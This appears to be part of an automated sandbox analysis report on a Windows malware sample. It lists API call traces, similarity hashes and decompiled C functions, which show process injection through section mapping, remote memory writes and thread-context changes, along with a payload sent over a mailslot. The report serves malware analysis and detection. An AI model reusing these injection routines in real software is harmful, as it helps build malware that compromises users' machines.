  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 58680

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:13FFE10E12298A4E8DC1EE7A0B003B93
Total matches:34
Initial Analysis Report:Open
Initial sample Analysis ID:58680
Initial sample SHA 256:75D846C690C188A3CC6A2E226FDD42AF8A1351B07FB56795106285178B0A0AA7
Initial sample name:sample.exe

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
